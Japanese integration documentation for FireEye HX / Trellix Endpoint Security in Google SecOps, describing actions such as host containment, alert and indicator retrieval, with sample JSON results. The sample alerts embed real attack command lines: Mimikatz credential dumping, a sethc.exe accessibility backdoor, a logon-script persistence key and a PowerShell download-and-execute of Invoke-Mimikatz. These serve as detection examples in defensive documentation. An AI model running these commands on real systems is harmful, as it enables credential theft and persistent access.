FireEye HX
統合バージョン: 17.0
Google Security Operations で FireEye HX の統合を構成する
Google SecOps で統合を構成する方法について詳しくは、統合を構成するをご覧ください。
統合のパラメータ
次のパラメータを使用して統合を構成します。
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| インスタンス名 | 文字列 | なし | いいえ | 統合を構成するインスタンスの名前。 |
| 説明 | 文字列 | なし | いいえ | インスタンスの説明。 |
| サーバー | 文字列 | https://x.x.x.x:<port> | はい | Trellix Endpoint Security インスタンスのアドレス。 |
| ユーザー名 | 文字列 | なし | はい | Trellix Endpoint Security への接続に使用するべきユーザーのメールアドレス。 |
| パスワード | パスワード | なし | ○ | 対応するユーザーのパスワード。 |
| SSL を確認 | チェックボックス | オン | いいえ | Trellix Endpoint Security 接続で SSL 検証が必要な場合は、このチェックボックスをオンにします(デフォルトでオンになっています)。 |
| リモートで実行 | チェックボックス | オフ | いいえ | 構成した統合をリモートで実行するには、フィールドのチェックボックスをオンにします。オンにすると、リモート ユーザー(エージェント)を選択するオプションが表示されます。 |
操作
ホストの隔離をキャンセルする
説明
Google SecOps の IP またはホストの Google SecOps エンティティに基づいて、Trellix Endpoint Security サーバーにタスクを含むキャンセル ホストを作成します。
実行
このアクションは次のエンティティに対して実行されます。
- IP アドレス
- ホスト名
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
N/A
ホストの隔離
説明
Google SecOps の IP またはホストの Google SecOps エンティティに基づいて、Trellix Endpoint Security サーバーにホストの封じ込めタスクを作成します。
パラメータ
| パラメータ | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| 封じ込めを承認する | チェックボックス | オフ | いいえ | ホストの封じ込めリクエストを自動的に承認して、Trellix Endpoint Security サーバーにホストの封じ込めタスクを作成するかどうかを指定します。自動的に承認されない場合は、Trellix Endpoint Security ウェブ コンソールで封じ込めリクエストを承認できます。 |
実行
このアクションは次のエンティティに対して実行されます。
- IP アドレス
- ホスト名
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
N/A
アラートを取得する
説明
指定された Google SecOps エンティティと検索条件に基づいて、Trellix Endpoint Security アラートを取得します。このアクションは、ホストまたは IP の Google SecOps エンティティで機能します。
パラメータ
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| 上限 | Integer | なし | いいえ | アクションが返すアラートの数(100 など)。 |
| 共有モードがある | プルダウン リスト _(デフォルト = any)_ | _default = any_ | いいえ | 特定の共有モードのインジケーターからトリガーされたアラートをフィルタします。_使用可能な値: any、restricted、unrestricted._ |
| アラートの解決ステータス | プルダウン リスト _(デフォルト = any)_ | _default = any_ | いいえ | アラートの解決ステータスに基づいてアラートをフィルタします。使用可能な値: _any、active_threat、alert、block、partial_block。_ |
| Alert Reported in Last x Hours(過去 x 時間に報告されたアラート) | Integer | なし | いいえ | 過去 x 時間(過去 4 時間など)に報告されたアラートをフィルタします。 |
| アラートの発信元 | プルダウン リスト _(デフォルト = any)_ | _default = any_ | いいえ | アラートのソース。使用可能な値: any、exd(エクスプロイト検出)、mal(マルウェア アラート)、ioc(侵害の指標)。 |
| 条件 ID | 文字列 | なし | いいえ | 特定条件の識別子でアラートをフィルタします。 |
| アラート ID | 文字列 | なし | いいえ | アラート ID で特定のアラートを返します。 |
実行
このアクションは次のエンティティに対して実行されます。
- IP アドレス
- ホスト名
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
[
{
"EntityResult": [{
"indicator": {
"category": "Mandiant",
"display_name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"url": "/hx/api/v3/indicators/mandiant/b7eae353_be50_44cf_8773_7067e9c66d7b",
"signature": null,
"_id": "b7eae353-be50-44cf-8773-7067e9c66d7b",
"uri_name": "b7eae353-be50-44cf-8773-7067e9c66d7b"
},
"event_id": 12880,
"event_values": {
"processEvent/processCmdLine": "at 13:00 \\\"C:\\\\TMP\\\\mim.exe sekurlsa::LogonPasswords > C:\\\\TMP\\\\o.txt\\\"",
"processEvent/parentPid": 4832,
"processEvent/md5": "e2a9c62b47f64525f7eb0cb8d637ff90",
"processEvent/processPath": "C:\\\\Windows\\\\System32\\\\at.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/timestamp": "2020-05-29T10:21:03.419Z",
"processEvent/startTime": "2020-05-29T10:21:03.419Z",
"processEvent/process": "at.exe",
"processEvent/username": "DOMAIN-COM\\\\Administrator",
"processEvent/pid": 7332,
"processEvent/parentProcessPath": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"processEvent/eventType": "start"
},
"event_type": "processEvent",
"subtype": null,
"reported_at": "2020-05-29T10:24:05.410Z",
"decorators": [],
"md5values": ["e2a9c62b47f64525f7eb0cb8d637ff90"],
"appliance": {
"_id": "86B7F11ACF8D"
},
"agent": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"containment_state": "normal"
},
"is_false_positive": false,
"event_at": "2020-05-29T10:21:03.419Z",
"source": "IOC",
"matched_at": "2020-05-29T10:23:22.000Z",
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/88",
"_id": 88,
"resolution": "ALERT",
"condition": {
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA==",
"_id": "yirelRwhiuXlF0bQhTL4GA=="
},
"matched_source_alerts": []
}],
"Entity": "PC-01"
}
]
アラート グループの詳細を取得する
説明
指定されたアラート グループの ID に基づいて、アラート グループの詳細情報を取得します。
パラメータ
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| アラート グループ ID | 文字列 | なし | はい | 詳細を取得するアラート グループ ID のカンマ区切りのリストを指定します。 |
実行
このアクションはエンティティに対しては実行されず、必須入力パラメータがあります。
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
{
"details": [],
"route": "/hx/api/v3/alert_groups/id",
"data": {
"_id": "622d3688031aa40faa4bd86028841276",
"assessment": "[Process reg.exe started] MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\reg.exe",
"first_event_at": "2020-08-06T06:32:55.761Z",
"last_event_at": "2020-08-06T06:32:55.761Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 729,
"agent": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"containment_state": "normal"
},
"condition": {
"_id": "yirelRwhiuXlF0bQhTL4GA==",
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA=="
},
"event_at": "2020-08-06T06:32:55.761+00:00",
"matched_at": "2020-08-06T06:37:55+00:00",
"reported_at": "2020-12-18T14:03:18.856+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"05cf3ce225b05b669e3118092f4c8eab"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/729",
"event_id": 207,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-06T06:32:55.761Z",
"processEvent/eventType": "start",
"processEvent/pid": 10356,
"processEvent/processPath": "C:\\Windows\\System32\\reg.exe",
"processEvent/process": "reg.exe",
"processEvent/parentPid": 9456,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-06T06:32:55.761Z",
"processEvent/md5": "05cf3ce225b05b669e3118092f4c8eab",
"processEvent/processCmdLine": "REG ADD HKCU\\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d \"C:\\TMP\\mim.exe sekurlsa::LogonPasswords > C:\\TMP\\o.txt\""
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/622d3688031aa40faa4bd86028841276",
"created_at": "2020-12-18T14:03:24.535Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "yirelRwhiuXlF0bQhTL4GA==",
"detected_by": "ioc_engine",
"host": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"primary_ip_address": "172.30.202.55"
}
}
},
"message": "OK"
}
Case Wall
| 結果のタイプ | 値 / 説明 | 種類 |
| 出力メッセージ * | 1 つの成功(is_success=true): Trellix Endpoint Security で次のアラート グループの詳細が正常に取得されました: {アラート グループ ID} 1 つが失敗した場合(is_success=true): Trellix Endpoint Security で次のアラート グループの詳細を取得できませんでした: {alert group ids} すべて失敗した場合(is_success=false): 指定されたアラート グループが Trellix Endpoint Security で見つかりませんでした。 |
全般 |
| ケースウォール | 名前: アラート グループの詳細
|
全般 |
アラート グループ内のアラートを取得する
説明
指定されたアラート グループで見つかったすべてのアラートを取得します
パラメータ
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| アラート グループ ID | 文字列 | なし | はい | 詳細を取得するアラート グループ ID のカンマ区切りのリストを指定します。 |
| 上限 | Integer | 50 | いいえ | アラート グループについて、API から返されるアラート リストの最大数を指定します。デフォルトは 50 です。 |
実行
このアクションはエンティティに対しては実行されず、必須入力パラメータがあります。
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": 712,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T08:04:09.521Z",
"matched_at": "2020-12-10T08:04:43.000Z",
"reported_at": "2020-12-10T08:04:49.607Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/712",
"event_id": 853899,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T08:04:09.521Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8800,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
},
{
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T09:26:14.114Z",
"matched_at": "2020-12-10T09:26:56.000Z",
"reported_at": "2020-12-10T09:27:08.735Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups/group_id/alerts"
}
Case Wall
| 結果のタイプ | 値 / 説明 | 種類 |
|---|---|---|
| 出力メッセージ * | 成功(is_success=true): Trellix Endpoint Security で次のアラート グループの詳細が正常に取得されました: {アラート グループ ID} 1 つが失敗した場合(is_success=true): Trellix Endpoint Security で次のアラート グループの詳細を取得できませんでした: {alert group ids} すべて失敗した場合(is_success=false): 指定されたアラート グループが Trellix Endpoint Security で見つかりませんでした。 |
全般 |
| ケースウォール | 名前: 「Trellix Endpoint Security Alert Group +{alert_group_id) Alerts」
|
全般 |
ホスト情報を取得する
説明
Trellix Endpoint Security の情報に基づいて、Google SecOps のホストまたは IP エンティティを拡充します。
実行
このアクションは次のエンティティに対して実行されます。
- IP アドレス
- ホスト名
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
[
{
"EntityResult": {
"last_alert": {
"url": "/hx/api/v3/alerts/254",
"_id": 254
},
"domain": "EXAMPLE-COM",
"last_exploit_block_timestamp": null,
"containment_state": "normal",
"timezone": "\\u05e9\\u05e2\\u05d5\\u05df \\u05e7\\u05d9\\u05e5 \\u05d9\\u05e8\\u05d5\\u05e9\\u05dc\\u05d9\\u05dd",
"gmt_offset_seconds": 10800,
"initial_agent_checkin": "2020-05-29T10:11:12.022Z",
"stats": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"primary_mac": "00-50-56-11-22-33",
"hostname": "HW-HOST-025",
"primary_ip_address": "1.1.1.1",
"last_audit_timestamp": "2020-06-01T09:10:38.752Z",
"last_alert_timestamp": "2020-06-01T08:02:30.817+00:00",
"containment_queued": false,
"sysinfo": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP/sysinfo"
},
"last_exploit_block": null,
"reported_clone": false,
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"excluded_from_containment": false,
"last_poll_timestamp": "2020-06-01T09:10:36.000Z",
"last_poll_ip": "1.1.1.1",
"containment_missing_software": false,
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"os": {
"kernel_version": null,
"platform": "win",
"patch_level": null,
"bitness": "64-bit",
"product_name": "Windows 10 Pro"
},
"agent_version": "32.30.0"
},
"Entity": "PC-01"
}
]
指標を取得する
説明
Trellix Endpoint Security サーバーから特定のインジケーターに関する情報を取得します。
パラメータ
| パラメータの表示名 | タイプ | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| 指標のカテゴリ | 文字列 | なし | はい | インジケーター カテゴリの uri_name 値を指定します。uri_name は、「インジケーターを取得」アクションを実行すると確認できます。 |
| 指標名 | 文字列 | なし | はい | インジケーターの uri_name 値を指定します。uri_name は、「インジケーターを取得」アクションを実行すると確認できます。 |
実行
このアクションはすべてのエンティティに対して実行されます。
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win\", \"osx\", \"linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
指標を取得する
説明
指定された検索パラメータに基づいて、Trellix Endpoint Security サーバーから侵害の指標(IOC)に関する情報を取得します。
パラメータ
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| 指標のカテゴリ | 文字列 | なし | いいえ | 指標のカテゴリ。 |
| 検索キーワード | 文字列 | なし | いいえ | 検索語句には、名前、カテゴリ、シグネチャ、ソース、条件の値を指定できます。 |
| 上限 | 文字列 | なし | いいえ | アクションが返すインジケーターの数(100 など)。 |
| 共有モード | プルダウン リスト _(デフォルト = any)_ | _default = any_ | いいえ | 特定の共有モードに基づいて指標をフィルタします。_使用可能な値: any、restricted、unrestricted._ |
| フィールドで並べ替え | 文字列 | なし | いいえ | 指定されたフィールドで結果を昇順に並べ替えます。 |
| 作成者 | 文字列 | なし | いいえ | 作成者に基づいてインジケーターをフィルタします。 |
| 関連するアラートがある | チェックボックス | なし | いいえ | 関連するアラートがあるインジケータのみを返すかどうかを指定します。 |
実行
このアクションはすべてのエンティティに対して実行されます。
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
[
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win", "osx", "linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
]
ホストのファイル取得のリストを取得する
説明
Trellix Endpoint Security サーバーから、ホストに対してリクエストされたファイル取得のリストを取得します。このアクションは、ホストまたは IP の Google SecOps エンティティで機能します。
パラメータ
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| 検索キーワード | 文字列 | なし | いいえ | Trellix Endpoint Security サーバーに接続されているホストのすべてのファイル取得を検索します。search_term には任意の条件値を指定できます。 |
| 上限 | 文字列 | なし | いいえ | アクションが返すレコード数(100 など)。 |
| フィルタ フィールド | 文字列 | なし | いいえ | 指定されたフィールド値を持つ結果のみを一覧表示します。結果は外部関連付け ID(external_id)でフィルタできます。 |
実行
このアクションは次のエンティティに対して実行されます。
- IP アドレス
- ホスト名
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
[
{
"EntityResult": [{
"comment": " ",
"zip_passphrase": "unzip-me",
"indicator": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"request_actor": {
"username": "admin",
"_id": 1000
},
"request_time": "2020-06-01T08:43:14.000Z",
"finish_time": "2020-06-01T08:46:39.156Z",
"_revision": "20200601084639156575147403",
"error_message": "The acquisition completed with issues.",
"req_use_api": false,
"alert": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"url": "/hx/api/v3/acqs/files/9",
"state": "COMPLETE",
"host": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id":
"FqNP4ybCdrlfVqG3lrCvRP"
},
"req_filename": "reg.exe",
"req_path": "C:\\\\Windows\\\\System32",
"_id": 9,
"external_id": null,
"condition": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"md5": "601bddf7691c5af626a5719f1d7e35f1"
}],
"Entity": "PC-01"
}
]
Is Contain Malware Alerts
説明
提供された Google SecOps ホストまたは IP エンティティのマルウェア アラートが Trellix Endpoint Security サーバーに表示されているかどうかを確認します。
実行
このアクションは次のエンティティに対して実行されます。
- IP アドレス
- ホスト名
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
[
{
"EntityResult": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"Entity": "PC-01"
}
]
Ping
説明
[Google Security Operations Marketplace] タブの統合構成ページで提供されるパラメータを使用して、Trellix Endpoint Security サーバーへの接続をテストします。
実行
このアクションはすべてのエンティティに対して実行されます。
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
N/A
アラート グループを確認する
説明
Google SecOps で処理されたアラート グループを確認して、HX プラットフォームと Google SecOps 間の同期を改善します。
パラメータ
| パラメータの表示名 | 種類 | デフォルト値 | 必須 | 説明 |
|---|---|---|---|---|
| アラート グループ ID | カンマ区切りのリスト | なし | はい | 確認するアラート グループ ID をカンマ区切りリストで指定します。 |
| 謝辞 | DDL | 確認 | はい | 指定したアラート グループを [確認] または [確認解除] にするかどうかを指定します。 |
| 確認コメント | 文字列 | なし | いいえ | 関連するアラート グループに追加する確認コメントを指定します。 |
| 上限 | Integer | なし | いいえ | JSON 結果で、API から返されるアラート グループのリストの最大数を指定します。 |
実行
このアクションはエンティティに対しては実行されず、必須入力パラメータがあります。
アクションの結果
スクリプトの結果
| スクリプトの結果名 | 値のオプション | 例 |
|---|---|---|
| is_success | True/False | is_success:False |
JSON の結果
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": "4532f4d8d50ab50a7830e2823ac488fd",
"assessment": "[Process powershell.exe started] POWERSHELL DOWNLOADER (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2020-08-17T12:03:38.496Z",
"last_event_at": "2020-12-10T08:02:22.561Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 718,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"url": "/hx/api/v3/conditions/yQjMv_j5PKfjL8Qu5uSm4A=="
},
"event_at": "2020-08-17T12:03:38.496+00:00",
"matched_at": "2020-12-10T09:26:55+00:00",
"reported_at": "2020-12-10T09:27:08.624+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"cda48fc75952ad12d99e526d0b6bf70a"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/718",
"event_id": 39882,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-17T12:03:38.496Z",
"processEvent/eventType": "start",
"processEvent/pid": 9896,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 5560,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-17T12:03:38.496Z",
"processEvent/md5": "cda48fc75952ad12d99e526d0b6bf70a",
"processEvent/processCmdLine": "powershell.exe \"iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds\" "
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 3
},
"url": "/hx/api/v3/alert_groups/4532f4d8d50ab50a7830e2823ac488fd",
"created_at": "2020-12-10T09:26:56.056Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
},
{
"_id": "e9f4d7baaa362d9d5d0b6e053ba0d44d",
"assessment": "[Registry key event] EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"file_full_path": "",
"first_event_at": "2020-12-10T08:04:09.521Z",
"last_event_at": "2020-12-10T09:26:14.114Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"event_at": "2020-12-10T09:26:14.114+00:00",
"matched_at": "2020-12-10T09:26:56+00:00",
"reported_at": "2020-12-10T09:27:08.735+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
